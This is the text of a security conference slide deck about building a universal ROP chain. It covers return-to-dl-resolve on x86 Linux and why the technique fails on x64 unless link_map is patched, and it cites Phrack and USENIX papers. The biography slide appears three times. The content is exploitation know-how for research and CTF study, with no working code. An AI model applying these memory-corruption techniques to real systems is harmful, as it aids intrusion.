2. ABOUT ME
• inaz2
• http://twitter.com/inaz2
• Security engineer & Python programmer
• AVTOKYO 2014 & 2015 speaker
• Weblog: Momoiro Technology
• http://inaz2.hatenablog.com/
• Written in Japanese but Google Translate will help us
2
3. LOW LAYER AND ME
• Got in touch at Plaid CTF 2013 (year of ropasaurusrex)
• Tried to understand exploitation for 3 years
• “ROP Illmatic: Exploring Universal ROP on glibc x86-64”
(AVTOKYO 2014)
• Introduced Return-to-dl-resolve technique
• Introduced JIT-ROP techniques in Linux
• Wrote “roputils” library for writing stable exploit codes
• “Abusing Interrupts for Reliable Windows Kernel Exploitation”
(AVTOKYO 2015)
• Verified IDT overwrite techniques still work in 32 bit Windows
3
5. LOW LAYER AND ME
• Got in touch at Plaid CTF 2013 (year of ropasaurusrex)
• Tried to understand exploitation for 3 years
• “ROP Illmatic: Exploring Universal ROP on glibc x86-64”
(AVTOKYO 2014)
• Introduced Return-to-dl-resolve technique
• Introduced JIT-ROP techniques in Linux
• Wrote “roputils” library for writing stable exploit codes
• “Abusing Interrupts for Reliable Windows Kernel Exploitation”
(AVTOKYO 2015)
• Verified IDT overwrite techniques still work in 32 bit Windows
5
7. LOW LAYER AND ME
• Got in touch at Plaid CTF 2013 (year of ropasaurusrex)
• Tried to understand exploitation for 3 years
• “ROP Illmatic: Exploring Universal ROP on glibc x86-64”
(AVTOKYO 2014)
• Introduced Return-to-dl-resolve technique
• Introduced JIT-ROP techniques in Linux
• Wrote “roputils” library for writing stable exploit codes
• “Abusing Interrupts for Reliable Windows Kernel Exploitation”
(AVTOKYO 2015)
• Verified IDT overwrite techniques still work in 32 bit Windows
7
9. SAYONARA ROP CHAIN
• https://www.corelan.be/index.php/2011/07/03/universal-
depaslr-bypass-with-msvcr71-dll-and-mona-py/
• Universal ASLR & NX/DEP bypass in Windows x86
• Use gadgets in non-ASLR DLLs
• Metasploit also generates its variant by
generate_rop_payload()
9
11. TRYING TO MAKE LINUX
VERSION
• Return-to-dl-resolve technique works in x86 Linux (w/o PIE)
1. Send crafted symbol structure to fixed address (bss section etc.)
2. Call it by dl-resolve@plt with adjusted arguments
• We don’t have to do stack pivot
11
13. BUT IT WON’T WORKS ON X64
• On x64 Linux, code section and data section are not adjacent
• Code at 0x400000, data at 0x600000
• Symbol version check is enabled by default
• Fail to find VERSYM and raise SEGV
• We need to read the pointer link_map@got and overwrite
[link_map+0x1c8] to 0
13
15. RECAP
• I tried to make universal ROP chain for Linux
• For x86, succeeded by return-to-dl-resolve technique
• But for x64, we have to traverse link_map and patch
• Heavy task for ROP… Game Over \(^o^)/
15
16. REFERENCE
• Advanced return-into-lib(c) exploits (PaX case study) (Phrack 58)
• http://phrack.org/issues/58/4.html
• Return to Dynamic Linker (Codegate 2014 Junior)
• http://www.codegate.org/content/board/post_list.php?bid=48&q=Retu
rn+to+Dynamic+Linker
• How the ELF Ruined Christmas (USENIX Security 2015)
• https://www.usenix.org/conference/usenixsecurity15/technical-
sessions/presentation/di-frederico
16